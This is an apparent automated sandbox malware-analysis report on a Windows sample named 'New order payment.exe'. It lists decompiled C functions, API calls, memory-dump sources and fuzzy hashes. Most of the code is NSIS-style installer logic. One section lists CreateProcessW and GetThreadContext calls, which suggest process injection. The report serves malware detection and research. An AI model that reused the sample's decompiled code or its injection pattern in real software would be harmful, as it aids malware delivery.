                                                                0x00000000
                                                                0x0040302a
                                                                0x00402ef7
                                                                0x00402efa
                                                                0x00402eff
                                                                0x00402eff
                                                                0x00402f09
                                                                0x00402f0c
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00402f12
                                                                0x00402f12
                                                                0x00402f12
                                                                0x00402f1a
                                                                0x00402f1c
                                                                0x00402f1c
                                                                0x00402f2d
                                                                0x00000000
                                                                0x00000000
                                                                0x00402f33
                                                                0x00402f36
                                                                0x00402f3c
                                                                0x00402f42
                                                                0x00402f4a
                                                                0x00402f50
                                                                0x00402f55
                                                                0x00402f5c
                                                                0x00402f5f
                                                                0x00000000
                                                                0x00000000
                                                                0x00402f65
                                                                0x00402f6b
                                                                0x00402f6d
                                                                0x00402f7a
                                                                0x00402f7c
                                                                0x00402faa
                                                                0x00402fb0
                                                                0x00402fb9
                                                                0x00402fbe
                                                                0x00402fbe
                                                                0x00402fc5
                                                                0x00403005
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00402fc7
                                                                0x00402fca
                                                                0x00402fea
                                                                0x00402fed
                                                                0x00402ff0
                                                                0x00402ff6
                                                                0x00402ffa
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00403000
                                                                0x00402fd6
                                                                0x00402fde
                                                                0x00000000
                                                                0x00402fe5
                                                                0x00402fe5
                                                                0x00000000
                                                                0x00402fe5
                                                                0x00402fde
                                                                0x00402fc5
                                                                0x0040300d
                                                                0x00000000
                                                                0x0040300d
                                                                0x00000000
                                                                0x00402f12

                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 00402EEC
                                                                • GetTickCount.KERNEL32 ref: 00402F6D
                                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F9A
                                                                • wsprintfA.USER32 ref: 00402FAA
                                                                • WriteFile.KERNEL32(00000000,00000000,0040F0E0,00000000,00000000), ref: 00402FD6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CountTick$FileWritewsprintf
                                                                • String ID: ... %d%%
                                                                • API String ID: 4209647438-2449383134
                                                                • Opcode ID: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                                                • Instruction ID: 896dd5a5e80e39cb813739a9bcc38eeef40bacba50e05a76af68061f47ce39f0
                                                                • Opcode Fuzzy Hash: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                                                • Instruction Fuzzy Hash: 13518A3190120AABDF10DF65DA04AAF7BB8EB00395F14413BFD11B62C4D7789E41CBAA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00405346, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E00405346(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x40735c;
				_v36.Group = 0x40735c;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x40734c;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                0x00405351
                                                                0x00405355
                                                                0x00405358
                                                                0x0040535e
                                                                0x00405362
                                                                0x00405366
                                                                0x0040536e
                                                                0x00405375
                                                                0x0040537b
                                                                0x00405382
                                                                0x00405389
                                                                0x00405391
                                                                0x00405393
                                                                0x00000000
                                                                0x00405393
                                                                0x0040539d
                                                                0x004053a4
                                                                0x004053ba
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004053bc
                                                                0x004053c0

                                                                APIs
                                                                • CreateDirectoryA.KERNEL32(?,?,00000000), ref: 00405389
                                                                • GetLastError.KERNEL32 ref: 0040539D
                                                                • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053B2
                                                                • GetLastError.KERNEL32 ref: 004053BC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                • String ID: C:\Users\user\Desktop$Ls@$\s@
                                                                • API String ID: 3449924974-776639217
                                                                • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                                • Instruction ID: c25a7037d2469be4335b8e9940eeaad57ca25a66f44a15dc7ff8fd6819e2376f
                                                                • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                                • Instruction Fuzzy Hash: 030108B1D14219EAEF119FA4CC047EFBFB8EB14354F004176D904B6280D7B8A604DFAA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 732260A6, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 237processthreadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateProcessW.KERNEL32(?,00000000), ref: 732261EA
                                                                • GetThreadContext.KERNEL32(?,00010007), ref: 7322620D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.247739404.0000000073225000.00000040.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                • Associated: 00000000.00000002.247720546.0000000073220000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247725746.0000000073221000.00000020.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247732759.0000000073224000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247749678.0000000073227000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: ContextCreateProcessThread
                                                                • String ID: D
                                                                • API String ID: 2843130473-2746444292
                                                                • Opcode ID: 9518cb0ffa070b63b53ba98e19124f383127dc463cc2acb8ab4d63890bfad445
                                                                • Instruction ID: f04cd8cdbba152db7d2f03796692afd03a6e074badf3a007cab03f7ebfca5710
                                                                • Opcode Fuzzy Hash: 9518cb0ffa070b63b53ba98e19124f383127dc463cc2acb8ab4d63890bfad445
                                                                • Instruction Fuzzy Hash: 7EA1F372E40209EFDB41DFA4CD80FAEBBB9AF08706F114465E515EB290D7B4AA81CF54
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00405EBA, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E00405EBA(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409010; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                                0x00405ed1
                                                                0x00405eda
                                                                0x00405edc
                                                                0x00405edc
                                                                0x00405ee0
                                                                0x00405ef2
                                                                0x00405eec
                                                                0x00405eec
                                                                0x00405eec
                                                                0x00405ef6
                                                                0x00405f0a
                                                                0x00405f1e
                                                                0x00405f25

                                                                APIs
                                                                • GetSystemDirectoryA.KERNEL32 ref: 00405ED1
                                                                • wsprintfA.USER32 ref: 00405F0A
                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00405F1E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                • String ID: %s%s.dll$UXTHEME$\
                                                                • API String ID: 2200240437-4240819195
                                                                • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                                • Instruction ID: e0394f74180a6a16eba84a37178681bb1de021cb3750537530e5e19d16d25b78
                                                                • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                                • Instruction Fuzzy Hash: AFF09C3094050967DB159B68DD0DFFB365CF708305F1405B7B586E11C2DA74E9158FD9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0040589E, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0040589E(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                                0x004058a2
                                                                0x004058a8
                                                                0x004058a9
                                                                0x004058a9
                                                                0x004058aa
                                                                0x004058b1
                                                                0x004058bb
                                                                0x004058c8
                                                                0x004058cb
                                                                0x004058d3
                                                                0x00000000
                                                                0x00000000
                                                                0x004058d7
                                                                0x00000000
                                                                0x00000000
                                                                0x004058d9
                                                                0x00000000
                                                                0x004058d9
                                                                0x00000000

                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 004058B1
                                                                • GetTempFileNameA.KERNEL32(?,0061736E,00000000,?), ref: 004058CB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CountFileNameTempTick
                                                                • String ID: "C:\Users\user\Desktop\New order payment.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                • API String ID: 1716503409-1678014616
                                                                • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                                • Instruction ID: e60e9e2f6482c2c4b9a71223117799e22c549444224f45eff9547ee1bfe60b0e
                                                                • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                                • Instruction Fuzzy Hash: 46F0A7373482447AE7105E55DC04B9B7F9DDFD1750F10C027FE049A280D6B49954C7A5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 732250D8, Relevance: 7.7, APIs: 5, Instructions: 187fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 73225A5A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.247739404.0000000073225000.00000040.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                • Associated: 00000000.00000002.247720546.0000000073220000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247725746.0000000073221000.00000020.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247732759.0000000073224000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.247749678.0000000073227000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: fce0e71f0f8ff157b801493ab189b16cca294ed351b0baee78b83b837cae809a
                                                                • Instruction ID: ebe7c0d25c94cd05f1356806c0e4d2bf2d7d017cfd69d562b078f6a61561e72c
                                                                • Opcode Fuzzy Hash: fce0e71f0f8ff157b801493ab189b16cca294ed351b0baee78b83b837cae809a
                                                                • Instruction Fuzzy Hash: 85612C75E5034CEAEB50CBE4EC52BEDBBB5AF48711F308416E514EA290D7B00A81DB05
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00401F84, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 60%
                                                                			E00401F84(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x423ff8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x423fc8 =  *0x423fc8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A29(0xfffffff0);
				 *(_t34 + 8) = E00402A29(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404E84(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b010, 0x409000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E0040358B(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                0x00401f84
                                                                0x00401f84
                                                                0x00401f89
                                                                0x00401f90
                                                                0x0040204c
                                                                0x00402197
                                                                0x00402197
                                                                0x004028be
                                                                0x004028c1
                                                                0x004028cd
                                                                0x004028cd
                                                                0x00401f9f
                                                                0x00401fa9
                                                                0x00401fac
                                                                0x00401fbb
                                                                0x00401fbf
                                                                0x00401fc5
                                                                0x00401fc9
                                                                0x00402045
                                                                0x00000000
                                                                0x00402045
                                                                0x00401fcb
                                                                0x00401fd5
                                                                0x00401fd9
                                                                0x0040201d
                                                                0x00401fdb
                                                                0x00401fde
                                                                0x00401fe1
                                                                0x00402011
                                                                0x00401fe3
                                                                0x00401fe6
                                                                0x00401fef
                                                                0x00401ff1
                                                                0x00401ff1
                                                                0x00401fef
                                                                0x00401fe1
                                                                0x00402025
                                                                0x0040203a
                                                                0x0040203a
                                                                0x00000000
                                                                0x00402025
                                                                0x00401faf
                                                                0x00401fb5
                                                                0x00401fb9
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000

                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FAF
                                                                  • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                                  • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                                                  • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                                  • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                                                                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                                                                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                                                                • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00401FCF
                                                                • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                • String ID:
                                                                • API String ID: 2987980305-0
                                                                • Opcode ID: 50cd007fc7b77623f8c7ad5bc39ef5e257e3bb497f63aa12232a7c38023ecf07
                                                                • Instruction ID: 27648393275eec621602a0353e8cc2bfbc6c1dadd98057bfccdba155e6fc7477
                                                                • Opcode Fuzzy Hash: 50cd007fc7b77623f8c7ad5bc39ef5e257e3bb497f63aa12232a7c38023ecf07
                                                                • Instruction Fuzzy Hash: 07215732D04215ABDF216FA48F4DAAE7970AF44354F60423FFA11B22E0CBBC4981D65E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004015B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 87%
                                                                			E004015B3(char __ebx) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402A29(0xfffffff0);
				_t13 = E0040571F(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E004056B6(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004053C3(_t28);
						} else {
							_t38 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004053E0(_t38) == 0) {
								goto L5;
							} else {
								_t22 = E00405346(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405B98("C:\\Users\\alfons\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                                                0x004015b3
                                                                0x004015ba
                                                                0x004015bd
                                                                0x004015c2
                                                                0x004015c6
                                                                0x004015c8
                                                                0x004015d0
                                                                0x004015d2
                                                                0x004015d4
                                                                0x004015d8
                                                                0x004015db
                                                                0x004015f3
                                                                0x004015f4
                                                                0x004015dd
                                                                0x004015dd
                                                                0x004015e0
                                                                0x00000000
                                                                0x004015eb
                                                                0x004015ec
                                                                0x004015ec
                                                                0x004015e0
                                                                0x004015fb
                                                                0x00401602
                                                                0x0040160f
                                                                0x0040160f
                                                                0x00401604
                                                                0x00401605
                                                                0x0040160d
                                                                0x00000000
                                                                0x00000000
                                                                0x0040160d
                                                                0x00401602
                                                                0x00401612
                                                                0x00401615
                                                                0x00401617
                                                                0x00401618
                                                                0x004015c8
                                                                0x0040161f
                                                                0x0040164a
                                                                0x00402197
                                                                0x00401621
                                                                0x00401623
                                                                0x0040162e
                                                                0x00401634
                                                                0x0040163c
                                                                0x00401642
                                                                0x00401642
                                                                0x0040163c
                                                                0x004028c1
                                                                0x004028cd

                                                                APIs
                                                                  • Part of subcall function 0040571F: CharNextA.USER32(004054D1,?,00421940,00000000,00405783,00421940,00421940,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040572D
                                                                  • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405732
                                                                  • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405741
                                                                • GetFileAttributesA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                  • Part of subcall function 00405346: CreateDirectoryA.KERNEL32(?,?,00000000), ref: 00405389
                                                                • SetCurrentDirectoryA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
                                                                Strings
                                                                • C:\Users\user\AppData\Local\Temp, xrefs: 00401629
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.244114325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.244110727.0000000000400000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244120939.0000000000407000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244125832.0000000000409000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244135351.0000000000417000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244139323.0000000000422000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244144896.000000000042A000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000000.00000002.244148657.000000000042D000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                                • API String ID: 1892508949-1943935188
                                                                • Opcode ID: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                                                                • Instruction ID: 7e794a0d764ef42534189bc4677109bd04a63590121f3ac1906b169044d7ab5d
                                                                • Opcode Fuzzy Hash: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                                                                • Instruction Fuzzy Hash: 67112B35504141ABEF317BA55D419BF26B0EE92314728063FF582722D2C63C0943A62F
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00406609, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 99%
                                                                			E00406609() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00406A77))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
